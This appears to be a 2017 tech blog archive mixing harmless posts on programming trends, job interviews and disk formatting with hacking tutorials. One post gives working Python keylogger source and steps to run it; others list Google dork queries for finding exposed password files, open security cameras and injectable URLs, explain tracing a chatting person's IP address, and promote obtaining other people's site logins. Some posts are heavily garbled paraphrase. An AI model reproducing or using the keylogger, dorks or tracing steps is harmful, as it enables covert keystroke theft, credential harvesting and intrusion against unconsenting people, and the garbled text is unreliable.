Saturday, 16 December 2017

These Are The Fastest Growing Programming Languages

A lot of new programming languages are making their way to the top and JavaScript is holding the top position for the past few years. Seems like the situation is about to change and JavaScript may soon be dethroned by Python. Python is one of the fastest growing languages and by 2019, it would have a clear domination in the programming community.

This is a prediction made by StackOverflow, a programming Q&A center. With more than 50 million amateur and professional developers visiting the website, StackOverflow is one of the qualified companies to make such a survey. Based on the huge increase in the questions from developers on Python and the data they have collected, StackOverflow made this survey possible.

Stack Overflow data scientist David Robinson said in a blog post that, “The term ‘fastest-growing’ can be really hard to define precisely, but we make the case that Python has a solid claim to become the fastest-growing major programming language.



Just in the past five years, Python went from least to top six most popular programming languages with a whopping 2.5x increase in the questions and views on the language. StackOverflow also stated that these statistics are related to developers from countries with “high-income”  and represent the trend in the United States, United Kingdom, Canada, Germany and other such countries.
The secret behind the growth of Python is its flexibility and versatility. Python is generally used by web and desktop developers, devops/sysadmin and recently even data scientists and machine-learning with Python became popular.
“It seems like Python is used in every domain — system operations, web development, deployment, scientific modeling, etc etc. There is no other language that is so versatile,” says Jacqueline Kazil, board director of the Python Software Foundation (PSF).

Thursday, 9 November 2017

Google used to ask these interview questions, but they’re so complicated they were banned


These tricky questions were banned from being asked during interviews at GoogleTo get a job in Google, you need skills and talent. But besides these, you also need to be prepared to tackle its “Googleyness,” as it is not that easy to get hired by the search giant.

Google is well-known for its high standards and bizzare set of head-scratching questions asked during interviews, which seems to have no answers. As a result, the candidate would apparently lose the race even before it use to start. Thankfully, these interview questions were ultimately banned from being asked completely.

In 2009, Seattle job coach Lewis Lin compiled a list of 140 questions that his clients were asked by Google. In this article, we have listed the 17 roughest interview questions in no particular order asked by the search giant.

How many golf balls can fit in a school bus?

How much should you charge to wash all the windows in Seattle?

Why are manhole covers round?

How many piano tuners are there in the entire world?

How many vacuums are made per year in USA?

Explain the significance of “dead beef.”

Every man in a village of 100 married couples has cheated on his wife… 

Every wife in the village promptly knows when a man other than her husband has cheated but does not know when her own husband has. The village has a law that does not allow for infidelity. Any wife who can prove that her husband is disloyal must kill him that very day. The women of the village would never disobey this law. One day, the queen of the village visits and declares that at least one husband has been unfaithful. What happens?

Design an evacuation plan for San Francisco.

How many times a day does a clock’s hands overlap?

You are at a party with a friend and 10 people are present (including you and the friend)…

Your friend throws a bet that for every person you find who has the same birthday as you, you get $1, but for every person he finds who does not have the same birthday as you, he gets $2. Would you accept the challenge?

A man pushed his car to a hotel and lost his fortune. What happened?

You need to check that your friend Bob has your correct phone number, but you cannot ask him directly…

You have to get from point A to point B. You don’t know if you can get there. What would you do?

You must write the question on a card and give it to Eve who will take the card to Bob and return the answer to you. Besides the question, what must you write on the card to make sure that Bob can encode the message so that Eve cannot read your phone number?

If a person dials a sequence of numbers on the telephone, what possible words/strings can be formed from the letters associated with those numbers?

Explain a database in three sentences to your 8-year-old nephew.

You are shrunk to the height of a nickel and your mass is proportionally reduced so as to maintain your original density. You are then thrown into an empty glass blender. The blades will start moving in 60 seconds. What do you do?

You have two eggs and get access to a 100-story building…

Eggs can be very hard or very fragile, which means they may break if dropped from the first floor or may not even break if dropped from 100th floor. Both eggs are the same. You need to determine the highest floor of a 100-story building an egg can be dropped without breaking. The question is how many drops you need to make. You are allowed to break two eggs in the process.

Friday, 3 November 2017

What is an Internet Cannon ? How does it works ?


What is an Internet Cannon?


Many things happen in the world of technology today. Any time you mention internet censorship, the first thing that comes to my mind is the nation of China. The country has earned fame from the Great Wall of China as well as the Great firewall of China. The experts from the country have the ability to access and proceed to block a particular website indefinitely. You may be asking yourself why a government such as this one can decide to do so. One of the simple reasons for this restriction is to illegalize certain forms of speech, activities and filter certain keywords from search engines by those who may be having ill motives as far as democracy is concerned. With such actions in place, individuals who may seem to offend the nation risk facing judicial consequences the end of the day.

What is an internet cannon?


Have you ever heard something about cyber crimes and cyber criminals? An internet cannon is a special type of cyber attack tool that has the capability of hijacking traffic flow on the internet. This takes place at the national level and then there is direction of traffic to the various targeted networks. Moreover, there is spyware or malware is send to another website where traffic seems to be flowing. While using any website from the different parts of the world, you risk attack by different attackers who are ever working day and night to steal important information from you. Some of them do it for fun while other does it for financial gains. Websites that have a lot of junk traffic are at higher levels of risk of attack than any other 

How does internet canon work?


Internet canon works by intercepting data that has been send between different nodes and go ahead to redirect the same to the another node. The powerful device does the balancing of analytic script that is most cases distributed by a specified search engine. The script does not necessarily mean that it is malicious. On the hand, this weapon has the ability to produce a full fledges form of attack. Similarly, it is used in intercepting emails that have not been encrypted. While talking about the internet cannon, I remembered NSA that had Quantum, which is also a tool that had the capability of redirecting individuals to fake networks with malware served by site without encryption. Other countries have also raised their concerns over the Chinese nation’s capability to access websites of foreign countries. 
 Many researchers have come up with claims that neutralization of the weapon is possible. However, this can only happen if the various websites do communicate through the encrypted https connections. When websites have communication encryption from end to end, it becomes very tricky to do the modification of any attacker who may be operating in between the person sending and the one receiving. Nevertheless, this may not take place in the case where the websites do not load files or the resources through the encryption that is non-HTTPS connected.

Thursday, 2 November 2017

What Is DDoS Attacks And How Does It Works ?


The internet has grown exponentially in use and not all of its controls have grown proportionally with it. The fact that DDoS Attacks stands for Distributed Denial of Service and is today’s most common Web-based attack method, the primary weapon of hacktivists and APT (advance persistent threat) groups looking to disguise their real intentions under a cloud of HTTP requests.

 DDoS attacks is an attempt to make an online service unavailable by overwhelming it with traffic from multiple sources. They target a wide variety of important resources, from banks to news websites, and present a major challenge to making sure people can publish and access important information. Recently New York Magazine site alleged to DDoS attack, which became inaccessible for over 12 hours.

Types of DDoS Attacks


DDoS attacks come in many different forms, from Smurfs to Teardrops, to Pings of Death. Below are details about the types of DDoS attacks : 


  •     TCP Connection Attacks – These attempt to use up all the available connections to infrastructure devices such as load-balancers, firewalls and application servers. Even devices capable of maintaining state on millions of connections can be taken down by these attacks.
  •     Volumetric Attacks – These attempt to consume the bandwidth either within the target network/service, or between the target network/service and the rest of the Internet. These attacks are simply about causing congestion.
  •     Fragmentation Attacks – These send a flood of TCP or UDP fragments to a victim, overwhelming the victim’s ability to re-assemble the streams and severely reducing performance.
  •     Application Attacks – These attempt to overwhelm a specific aspect of an application or service and can be effective even with very few attacking machines generating a low traffic rate (making them difficult to detect and mitigate).

In this article, with the help of infographic created by Barricade will explain you what is DDoS attacks and how does it works.



Wednesday, 1 November 2017

Top 5 Questions Asked During IT Job Interviews


Every year thousands are being recruited for the IT industry, such is the boom. Looking from s student’s point of view, facing the IT interviews can be really difficult. The best thing that you can do to get ready is to thoroughly consider the inquiries you’re prone to be solicited and figure answers ahead from time. Here are top 5 IT interview questions and how to make an in number response to each.

1. Why do you need this employment?

A standout amongst the most unsurprising inquiries and critical! You have to show that you have examined the business and tie your insight into them into the skills and intrigues that drove you to apply. For instance, an interviewee with a little advertising office may say: “I’m generally prepared to tackle obligation and feel this will come all the more rapidly with a firm of this size. A little firm additionally allows to manufacture closer working associations with customers and partners and I’ve found through my past work encounter this makes an association more viable and also all the more fulfilling to work in.”

Attempt to locate some particular component on which the business prides themselves: their preparation, their customer base, their distinction, their open picture, and so on. This may not generally be conceivable with little associations but rather you may have the capacity to get something of this nature from the questioner.

2. Depict a circumstance where you worked in a group

Another competency-based inquiry. Most occupations will include a level of cooperation. The questioner needs to evaluate how well you relate to other individuals, what part you take in a gathering and whether you have the capacity to concentrate on objectives and targets.

Diagram the circumstance, your specific part and the assignment of the gathering general. Depict any issues which emerged and how they were handled. Say what the outcome was and what you gained from it.

Cases could incorporate putting on a dramatization or music creation; a gathering task at college; a business diversion or “Youthful Enterprise” plan or working in a fast-food eatery.

3. What do you hope to be doing in 5 years time?

Attempt to dodge unclear or general answers, for example, “I would want to develop with the obligation I am offered and to create myskills to the extent I am capable” or “I would hope to be in an administration part by then”.

Be particular, however adaptable: selection representatives need to know you recognize what you need. Procuring, preparing and creating staff costs a great deal of cash, something like £7,000 to enlist another graduate, so they need to ensure that you are focused on staying with the association. “I’d like to progressively take more obligation and maybe by then be a brand supervisor for a noteworthy item.”
Discuss your enthusiasm for the business in which the organization with works. Stress the worth you can convey to the association and what you can accomplish for it.

You have to demonstrate that you are goal-oriented additionally your objectives must be practical – saying you hope to be a senior supervisor following two years is unrealistic to go down well! Utilize the business’ site or LinkedIn profiles to pick up a thought of the profession ways took after by past graduates. You may have the capacity to supplement this by demonstrating your insight into expert bodies and the strides you should take to pick up their capabilities, e.g. in territories, for example, showcasing or HR.

Discuss obligations you might want to have and expected accomplishments instead of the amount you would hope to be acquiring in five year time as this will make a business believe you’re more inspired by the material advantages than the profession itself. Discuss your vocation advancement: abilities you’d like to procure or you’d like to be utilizing, and expert capabilities you’d like to get.

4. What has been your most prominent accomplishment?

To say that your most prominent accomplishment was getting to University, or getting your degree, will do nothing to recognize you from the various applicants. Unless you have needed to battle with remarkable troubles to pick up your scholarly capabilities -, for example, disease or real family issues – attempt to say something other than what’s expected that will make you emerge.

This doesn’t need to be an Olympic award or a demonstration of bravery. Preferably, it ought to give proof of aptitudes applicable to the occupation such as communication, activity, cooperation, sorting out or determination. Like organising a games or raising money occasion, learning enough Spanish in three months to make myself comprehended when I went around Mexico, training for and finishing a marathon then again even a 5 Kilometer race.


5. Why did you pick your college and what elements affected your decision?

On the off chance that you had, truth be told, no genuine decision in where you went to University – e.g. on the off chance that you needed to concentrate near and dear for budgetary or family reasons – you can discuss the more broad issues you needed to consider in coming to University and maybe lead the inquiry round to your decision obviously as opposed to organization.
Your real answer is less imperative than the confirmation of choice making, arranging and sensible thinking abilities that it ought to illustrate. This is an open door for you to show these key features.

Monday, 30 October 2017

What skills are needed to get a software engineering job at Google?


We all know that getting placed in Google is one of the most desirable employers in the world. Engineers at Google are the masters, and their salary is high enough. For Google employees salaries for Interns start from $70,000 to $90,000. Whereas for the software engineers can get from $118,000 and senior software engineers would make up for an average of amount $152,985.

Not only Google top companies like Facebook, Amazon, and Microsoft pays a good amount of salaries to the Software engineers. But, getting placed in good companies is not an easy job and takes in a lot of skill.

A lot of good skills are required from a software engineer background to get placed in the large enterprises. Happily, Google has released a list of skills required that they expect from an engineer who applies for a job at Google. The list will help to secure job in Google and other top companies if you follow and improve the list.

Check the list below:

1. First and foremost thing to do is Mastering the foundation. Go through an introduction to CS classes, from sites like Coursera or Udacity and improve your foundation skills.

2. Learn any one of the object-oriented programming languages like Java, C++, or Python.

3. Don’t restrict your limits learn few other programming languages like CSS, Ruby, JavaScript, and HTML. These programming languages will help to improve your skill levels. CodeAcademy and W3school have the best tutorials to learn. 

4. Always Test your code and others too. It is like finding your mistake and being smart. Google wants developers to “Find bugs, make tests, and play with software.” Head over to Udacity.

5. Have a good grip in abstract math. Abstract Math is a math like logical reasoning and discrete math. This helps a lot of computer science depends on the situation. MIT has good mathematics courses available for computer science.

6. Understand data structures and algorithms. Google wants engineers to learn about data types like queues, stacks, and bags, as well as grasp, sorting algorithms like merge sort, quicksort, and heapsort. MIT provides these prescribed online resources.

7. Having good knowledge on the operating system because it is where you do most of your work at. The University of California and Berkeley provides the courses.

8. Know Artificial Intelligence. It is known from long time Google loves AI and robots. Stanford has courses on it.

9. Learn to develop compilers. By learning to develop compilers, you will learn how a program is written in a high-level language designed for humans is systematically translated into a program written in low-level assembly more suited to machines. Coursera is best for learning about compilers.

10. Learn about cryptography. These days cyber security has become a crucial part. Udacity and Coursera provide courses. 

11. Learn about the parallel programming because being able to carry out a lot of computations at the same time is super powerful. The University of Illinois has good courses on it.

Saturday, 28 October 2017

How to Create a Keylogger in Few Minutes Simply by using Notepad

Keylogger also called keystroke logging, are software programs or hardware devices that record keys struck on the computer keyboard of an individual computer user or network of computers.It almost records every keystroke that user typed and saved as a text file.

Keylogger Creation

1. Just open the notepad and copy paste the script.

import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location
file_log = 'keyloggeroutput.txt'
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages() 

2. Now save it something filename.pyw and execute the keylogger file. When you need to quit logging, open up task manager and execute all the “python” forms. At that point search for keyloggeroutput.txt in a similar index were the something.

At that point search for keyloggeroutput.txt in a similar index was the filename.pyw is. Open it up and you should see whatever you wrote.

This is just a simple keylogger, there are many advanced keyloggers available for Windows and Android.

 

Wednesday, 25 October 2017

Best Hacking Tricks To Increase Your Internet Speed


We all know that a slow internet connection really costs time and makes feel annoying . many friends ask me the ways to increase their internet speed. However . it's possible to do to some extent and make your internet much better then it was in the past.

There are Two tricks that will help you to increase your internet speed..

First Method- Speed Up Your Net Speed By 20%

1. First you go to start button
2. Go To Run
3. Type gpedit.msc And Then Hit Enter.
4.Then Expand Adminsitrative Templates.
5.Then Network
6.Then QoS Packet Scheduler. 

Now A New List Appear . Click On Limit Reservable Bandwidth.
Just Disable it.
Now You Click On Apply

That's It Now You Are Done !! :)
Now Just Restart Your Computer . And I hope You will Get change in Your Speed

Some Basic Tricks From My Side-
1. Use IDM To Boost Your Downloading Speed.
2. Use A Good Anti-virus in Your Computer.
3. Remove Unwanted Add-ons, Software,Unwanted Files Form Your Computer.
4.Update Your Drivers Periodically.
5.Keep A Good Maintennance Of Your Computer.

Keep Visiting :)

Sunday, 22 October 2017

How To Know Who Created Fake Id On Facebook


Let Me Go Step By Step And Show How You Can Get To Know Who Created Yours Or Someone Else’s Fake ID On Facebook. First of all you need to know the IP address of that user who created your fake ID. So here are the steps to know the IP address of that person:

1‐ You must chat with that person. Just invite him/ her on chat or ping him on facebook chat. Note: Before trying all these steps make sure all other browsers and tabs are closed. Apart from your facebook tab no other tab should be open. In fact, no program should run which uses internet apart from this facebook tab. If possible delete history as well as cache. 

2‐ Once you have pinged that person and chat is on open Command Prompt (start‐ >run‐ >cmd) 

3‐ When the command prompt opens type the command mentioned
below and press enter netstat ‐an

4‐ You will be able to see all established connections IP addresses there. Ignore the one’s that start with 127* as well as 0*. Rest (Not more than 1 or 2) of the IP are suspicious. Note down these IP address.

5‐ Now once you have noted down the IP address open this website: http://www.iplocation.net/ It will show you all the information about that user, his ISP and his location in the map. 

You can zoom in and try to know the exact area in the map. If there’s anything serious you can contact ISP and ask them about everything you want to know. Enjoy...

Sunday, 15 October 2017

Top 5 Highest Paying Jobs for Computer Science Majors


Computer science experts are highly demanded. Previously, experts in this field were viewed as geeks. Today’s economy has changed the world views of the professionals. Skilled programmers are crucial in every business. Computer science experts are some of the highest paid professionals. Many of them have landed high-profile jobs. Students are given options of specializing in one computer science major. None of them is lesser. Their choices depend on their preferences.

This article outlines some of the best jobs for computer science majors.

Highest Paying Jobs for Computer Science Majors


1. Network architects


Network architects design computer networks. They deal with network layout which consists of software, hardware, communication protocols and transmission of both wired and wireless connections. The network architecture is the organization of tasks in computers. Architects are expected to develop systems that suit individual company needs. The professional ought to understand the layout of that particular building. He decides where to place the cables. The job requires a lot of skills. 

2. Applications Developer

Applications developer has the responsibility of ensuring that all aspects of development are in order. The developer also makes sure that application software is well supported. His daily duties include testing hardware and software, management of junior development staff and managing project workload. 

3. Data warehouse manager

Data warehouse manager is an important resource in every business. This expert controls activities of business and IT customers. They design complex data systems. They have the responsibility of making sure that all warehouse designs, procedures, and standards are in the right order. His duties put him in a position of regularly consulting with the senior management.

4. IT directors

IT directors oversee plans, organization, and execution of IT function. They direct their operations to cater for consumer requirements. The experts support maintenance of running applications. They know how the perfect solutions for technical issues. A person who specializes as an IT director directs network delivery and recommends new products.

5. IT security managers 

IT security managers protect organization’s computers against threats. Cyber criminals develop computer viruses which can breach the entire system. That is why every organization requires a specialist to assess all security measures. IT systems can be easily attacked. Tests are carried out to detect security threats. The professionals are involved in research to know the nature of future threats. Employees are also trained on good practices to avoid security risks. The world is run by computers. The society depends on the machines. That is why computer specialists are highly demanded. Whether in manufacturing, healthcare, retail, finance or insurance, computer specialists are important resources.

Friday, 13 October 2017

How to format a computer using command prompt in BIOS

Format a computer using command prompt in BIOS are often used when you want to format system partition on your hard drive, to proceed, you need to prepare a system bootable CD/DVD.

Steps to format a computer using command prompt in BIOS

         1.      Insert bootable CD/DVD,> Reboot;  > Press F2/F8/Delete bottom, or any other key according to your pc prompt, to go into BIOS;
         2.      Define boot order: make boot form CD/DVD as the first option; > Save; > Exit;
          3.      Reboot; > click Use recovery tools that can help fix problems starting Windows when you disc loaded;
> Windows installation; > Command Prompt



4.         Type: format c: /fs: ntfs


To format a computer c drive in windows 7 and reinstall it, just insert a your bootable system CD/DVD after the steps above.

How to Format Non-system partition:


There are many ways to format non-system partition, also called data partition or logical partition, I will listed 4 of them to format data partition: 
 1. Format Partition in Command Prompt:

    1.1 Open command prompt by Typing CMD in Run box (WIN+R)
    1.2 Type command in order:
        diskpart  
        list disk  
        select disk ###  
        list partition  
        Select partition ###  
        format    

    1.3 Type: exit

2. Format Partition in Disk Management:

    2.1 Press Win+R to Run diskmgmt.msc
    2.2 When your disk map loaded, right-click on the partition you want to format; > Format;
    2.3 Select file system : NTFS or FAT32, NTFS is recommended
    2.4 Tick Quick Format

3. Format Partition in Windows Explorer:

    3.1 Press WIN+E to open Windows Explorer
    3.2 Right-click on the target partition; > Format
    3.3 Choose File system; > Tick Quick Format; > OK

4. Format Partition in Partition Expert:

    4.1 Run Partition Expert; > Right-click on data partition; > Format Volume;
    4.2 Choose File system: NTFS; > cluster size: 4K; > tick Quick Format;
    4.3 OK; > Commit;


 
 

Sunday, 8 October 2017

Fix a Corrupted Pen Drive or SD card using Command Prompt


Has your Pen Drive or SD card stopped working suddenly? Are you tired of formatting it again and again? And still, your storage devices continue to malfunction.

Most of you might have faced this problem with your Pen Drives and SD cards. If yes, then we are here to help you solve this problem and fix your corrupted USB drive.

We can repair a corrupted pen drive or SD card using Command Prompt in windows. This How to guide will help you do that in a simpler way. In this technique all you need is to enter some commands in command prompt and windows will forcefully format your corrupted pen drive or SD card.

Fix a Corrupted Pen Drive or SD card using Command Prompt


Follow these simple steps and you can do that in just a few minutes.

Step-1:
Connect the corrupted pen drive or SD card to your computer.

Step-2:
Now open Command window. You can actually do this in several ways. Press Windows Key+R and type cmd in the dialogue box and click on OK. This will let you open a command window. Also, you can click on start button and type cmd in the search box and select the command prompt program.

Step-3:
Once done with opening the command prompt window, it’s time to enter some commands into it.

Type diskpart and press Enter.

Next type list disk and press Enter. This will display a list of all the storage devices connected to your computer. 

Step-4:
Now type select disk <the number of your disk> and press Enter. Here the number of your disk is the number assigned to your removable storage.

Note: Make sure you enter the number correctly. Otherwise, you may format your internal hard drive.

Step-5:
After selecting the disk accurately, type clean and press Enter. Next type creates partition primary and hit Enter.

Step-6:
Now type active, and press Enter.

Type select partition 1, and hit Enter.

Step-7:

Finally, type format fs=fat32 and hit Enter. You can write NTFS instead of fat32 to format drives larger than 4 GB.The format process will complete in a few minutes. Do not close the window till the process is done. 

Here is the entire process.
 Once done your USB drive is back to normal again.

Friday, 29 September 2017

This Is How You Can Use Google For Hacking

This Is How You Can Use Google For Hacking

 

Google is used for hacking by many government cyber secret agents. They also use Google search engine for obtaining several helpful data. Google search is used mostly by Cyber detectives and hackers but not in an ordinary way. They use Google search in a more advanced way for professional hacking. 


Google is used for hacking by many government cyber secret agents. They also use Google search engine for obtaining several helpful data. Google search is used mostly by Cyber detectives and hackers but not in an ordinary way. They use Google search in a more advanced way for professional hacking.

In 2013, National Security Agency launched an eBook which explained the process of exploring for important information on the internet. The title of the eBook is ‘Untangling the Web: A Guide to Internet Research‘ and has 643 pages. It is guided to utilizing the web files, search engines, public websites, etc. The most vital section of this eBook is “Google Hacking”. 

 The book explains that “Google hacking” was not meant for public information it was confidential. Google’s spiders allow Google to guide all the sections, if not restricted. Robot.txt file will limit the use of Google spiders. Google began guiding files like Word, PDF, Excel and Access two years before. The webmaster should configure the Robot.txt file properly otherwise, the condition can degenerate.

Usually, some association fails to keep their data and files confidential. As a result, it emerges in Google’s search results. Google hacking can be used to gain such data and files. The below are the data which often leaks:

1) User ID, PC account logins, and passwords
2) Private or administrator business information
3) Private and economic data
4) Vulnerable government related data’s
5) Error in websites and servers

 

Following are frequently used Google hacking ways from which you can get vulnerable data’s.

Searching for Data’s Via File Types:
There are several authorisations who keep financial information in Microsoft Excel format. Therefore, you can search file types in Microsoft Excel format. You can search files in data file types like Excel, Word or PowerPoint. For the site, you can insert the company name or the URL of the company. You have to compulsorily enter a stock words and phrases like do not distribute, proprietary, etc. at the end.

 Searching for Login Information:
You can search for login ID. The foreign sites generally adopt these expressions in English.

 Searching for Passwords:

 Occasionally, Google provides listings in the search results which are not for public use. The Passwords can be obtained from the type of errors.

[intitle:”index of’ site:za password]

Numrange Searches:
According to NSA, this is the creepiest searches of Google. Here you have to apply two numbers which are divided using two dots and without any gap. For example:

[site:www.thisismydadsbank.com 617..780]

You can get an accurate view of this search in the eBook.

Bypass the Registration process:
Some site asks for registration in order to outlook its subject and this can be bypassed by using Google Hacking trick. You can use following technique in search:

[site:www.companyname.com inurl:database]
[site:www.companyname.com inurl:directory]
[site:www.companyname.com inurl:index]
[site:www.companyname.com inurl:companies]

You can obtain more techniques from NSA eBook.

Thursday, 21 September 2017

YouTube downloader website, YouTube-MP3 shut down; top 5 alternatives

YouTube-MP3- The world’s largest and most popular YouTube movies/audio download website shut down

If you are a YouTuber or YouTube fan, chances are that you probably might have used YouTube-MP3.Org to download your favorite song in MP3. This was the largest and most popular website on the Internet used by millions to convert the copyrighted YouTube songs into free MP3s.

YouTube-MP3, one of the most top free YouTube Mp3 convert and download sites is soon shutting down, thanks to the music industry. The Anti-piracy group led by RIAA, the chief arm of music industry’s anti-piracy drive have managed to get a court order from a federal court in the United States to shut YouTube-MP3.org down.

The anti-piracy groups who have their eyes peeled on torrent websites have now turned to the YouTube to MP3 and MP4 converter websites. According to Torrent Freak, the admin of YouTube-mp3.org — who was sued by the Recording Industry Association of America last year — has apparently agreed to hand his site over to the RIAA in return for a certain unknown settlement. 

According to the settlement documentation, the site’s operator is restrained from “knowingly designing, developing, offering, or operating any technology or service that allows or facilitates the practice commonly known as ‘streamripping.’”

Users may still see the familiar homepage of YouTube-mp3.org but as soon as you try to input a YouTube URL and try to convert, you will get a popup indicating  “this service is not available from your jurisdiction.” 

Though there are still hundreds of YouTube to MP3 or MP4 converter websites, YouTube-Mp3.org was non-frills and easy to use music converting website and will be missed by millions of music lovers who used it regularly. We are making a list of top five free online YouTube to MP3 converters which we have checked and tested for malware. The links have been removed so as not to be made a party to copyright infringement. 

Top 5 Free Online YouTube to MP3 Convertering Websites
 
#1: ListenToYouTube 

ListenToYouTube is the most famous free YouTube to MP3 converter online. No signup is needed. Simply copy and paste the YouTube video URL and it will download the Flash video to its server. After the downloading, it will extract the MP3 audio files and give you a download link to get the MP3 files. However, sometimes the quality of the MP3 files is not as good as you’ve expected.

#2: Video2MP3 

Video2MP3 is another great free online YouTube to MP3 converter that is quite easy to use. It claims to be the most reliable free YouTube video to MP3 converter online over the web. Most of the popular video services providers like Dailymotion, MyVideo, etc. are well supported. Simply copy the video link to the converter box and you’ll get the MP3 files in a few minutes. What’s more, this tool allows you to choose the quality to your needs.

#3: VidToMP3 

VidToMP3 is a new site that gives you an easy way to download videos from YouTube and convert them to MP3 for playing on your MP3 player. In addition to YouTube, it also well supports other popular video sites like Dailymotion, Metacafe, Veoh, Break, Vimeo and tons of other similar sites. To download YouTube to MP3 online with this service, simply copy the URL of the page with video and paste it into the box, then click Download and wait. When the conversion completes, a pop-up window will guide you to download the MP3 files.

#4: FLVTO 


FLVTO is another amazing tool to convert YouTube to MP3 online easily. Different from other free online YouTube converter to MP3, its web page is quite attractive. Usually, the quality of the MP3 audio files you get is high and the downloading speed is relatively fast. The same as other utilities, you just need to enter the YouTube video link and click Convert to extract MP3 files from online YouTube videos.

#5: YouTubeToMP3 

YouTube to MP3 is a new site that allows you to convert and download the audio from YouTube video’s for free! Simply Paste the link to the youtube video you’d like download in the form above then select the output format and click the convert button. Wait while Youtube MP3 converts your file to your desired format and download. It’s that easy!!!

Wednesday, 20 September 2017

Windows cannot be installed to this disk. the selected disk has an MBR partition table. On EFI system, Windows can only be installed to GPT disks

How to fix this and install windows  as usual.


There is a simple way to fix this :  

1. Temporarily disable the EFI Boot Sources setting in the BIOS:
  •         Restart the computer, and then press F10 to enter the BIOS.
  •         Navigate to Storage > Boot Order , and then disable the  EFI Boot Sources .
  •         Select File > Save Changes > Exit .
 2. Install the Windows operating system.
 3. Enable the EFI Boot Sources setting in the BIOS:

  •         Restart the computer, and then press F10 to enter the BIOS.
  •         Navigate to Storage > Boot Order , and then enable the EFI Boot Sources .
  •         Select File > Save Changes > Exit .

Friday, 15 September 2017

Methods To Search Someones Phone Number Online Easily

Phone Number: We all know how important a phone number is for everyone life. If any unknown number is disturbing, you will surely want to know the caller’s identity. First, get the knowledge of the person’s detail and their hidden information about the number. The contact ID’s or the identity, you provide to the service provider or the companies is never shared with anybody.

Although, there are several cruel people maltreating contact information. In this article, you will come to know about how will you hijack the number. Other than, getting the personal detail just find the phone number on the online networks. Here are certain methods by which you will be able to get any one number online.

1) You can take the help of Social Media Network

There are many people who store their phone number in the social account. When you are looking for the number, you just have to search by their name. After you have reached the person, go to the info to get the number. You should try to use a probable title for the person you are looking for and surely you will be able to find the number. 

 Methods To Search Someones Phone Number Online Easily


2) You can also search by using Search Engines

In search tab, write the necessary details of the person you are searching. Now, leave the Search Engine to find other details about the person. The search engine not only finds the person on other sites but also in social medias and accounts on the internet. It is also a method to find the exact number of anyone. 

 Methods To Search Someones Phone Number Online Easily

3) You can use external apps

You will find many apps to search the number. These types of apps give you the full information about the person. It is actually hard for any search engine or app to find the details. Truecaller is an app by which you will be able to find not only the person’s phone number, but also you can block spam calls and spam SMS. 

 Methods To Search Someones Phone Number Online Easily

After reading this article, you can detect anybody’s phone number online. You should avoid getting the calls from unknown number. If further, you are receiving the call find it using these methods to locate the phone number. I hope, these methods will be helpful for you.

Friday, 8 September 2017

Login Any Website Without Registration Or Sign up

Till Now I'm Posted Many Useful Tricks.. Today I'm Posting Very Useful Trick To All Of You.. Yes.. I Know After Reading My Trick Everyone Getting Relax..
So, Your Wait is Over.. Today I'm Giving You Trick, To Login any
Website Without Sign‐Up..

Many Website has a forced login System.. Means For Browsing Such Sites You should Need To Login.. And Its Very Time Taking.. So, Today Your Problem Will Solve..
Just Go On Below Website 






Then You Will Go On Homepage, There Is a Box Just Type Name Of Website in that Box which logins you want..

And Press Get Logins Button..
 
Wow... You Will Get Logins For that Website.. Enjoy... Please Give
Comments If You Like This Trick

Keep Visiting :)

Sunday, 3 September 2017

Google Dorks : Use Google For Hacking websites, Databases and Cameras

Note: This article is only for educational purpose. You can use this knowledge to increase your system’s security or for any ethical purpose.

Using Google Dorks For Hacking


Google is the most popular search engine on the internet right now. People use it to find their answers, images, videos, news and notes etc. But, did you know that the Google can also help hackers to find vulnerable targets and steal unauthorized information?. Google is as much helpful for hackers as any other general user.

Hackers use Google search engine to find Vulnerable systems (Be it a database, website, security cameras, or any IOT gadget) with the help of some special search queries. There are many Google search engine queries that can uncover vulnerable systems and/or sensitive information disclosures. These queries are known as Google Dorks. 

What is Google Dork or Google Dorking? 

 

In 2002, Johnny Long began to collect interesting Google search queries that uncovered vulnerable systems or sensitive information disclosures. He labeled them Google dorks.  Some people call it Google hacking.

Google Dorking is the method for finding vulnerable targets using Google dorks. Google Dorking can return usernames and passwords, email lists, sensitive documents and website vulnerabilities.

Ethical Hackers use Google Dorking to improve system security. Black hat hackers use this technique for illegal activities, including cyber terrorism, industrial espionage, and identity theft.

Google dorks can find Footholds, Sensitive Directories, Vulnerable Files, Vulnerable Servers, Network or Vulnerability Data, Various Online Devices, Files Containing Usernames and Passwords, Sensitive Online Shopping Info and Pages Containing Login Portals.

 List of Google Dork Queries

Google dork Queries are special search queries that can be searched as any other query you search on google search engine. You just need to type the query in Google search engine along with specified parameter.

1. Google Dorks  For Hacking websites
  •  intitle: This dork will tell Google to show only those pages that have the term in their HTML title. For example: intitle:”login page” will show those pages which have the term “login page” in the title text.
  • allintitle: It is similar to intitle but looks for all the specified terms in the title. For example: allintitle:”login page”
  • inurl: It searches for the specified term in the URL. For example: inurl:”login.php” and inurl:proftpdpasswd
  • allinurl: It is similar to inurl but looks for all the specified terms in the URL. For example: allinurl:”login.php”.
  • define: Google will define this message and will look for what had this error. For example: define:”sql syntax error”
  • site: This dork will return all the pages of a particular website that is crawled by Google. For example, site:rrulebreaker.blogspot.com
  • link:  It will also look in the site for URLs that possibly are vulnerable to sql injection. For example: link:index.php?id=

2. Google Dorks For Hacking Files


  • filetype: Searches for specific file types. filetype:pdf will look for pdf files in websites. filetype:txt looks for files with .txt extension. This way you can search for a file with any extension like mp4, mp3, Mkv, etc. site:onedrive.live.com shared by
  • intitle: You can look into file directories of websites directly and download specified file intitle: index of mp3 for mp3 files. You can replace mp3 with any other extension. You can also use to find any particular movie or game.  intitle: “index of ” intext: “movie name” .
  • book: find any book using Google search engine. for example: book: java
3. Google Dorks for finding username and passwords 

  •     intext: passwords filetype: txt
  •     mysql history files
  •     intext: account details filetype: txt
  •     intitle:index.of intext:”secring .skr”|&q…
  •     people.lst
  •     passwd
  •     master.passwd
  •     pwd.db
  •     htpasswd / htpasswd.bak
  •     htpasswd / htgroup
  •     spwd.db / passwd
  •     passwd / etc (reliable)
  •     config.php
  •     passlist
4. Google Dorks For Hacking Security Cameras 
Type any of these queries into google to find vulnerable security cameras
  •     Inurl:”CgiStart?page=”
  •     inurl:/view.shtml
  •     intitle:”Live View / – AXIS
  •     inurl:view/view.shtml
  •     inurl:ViewerFrame?Mode=
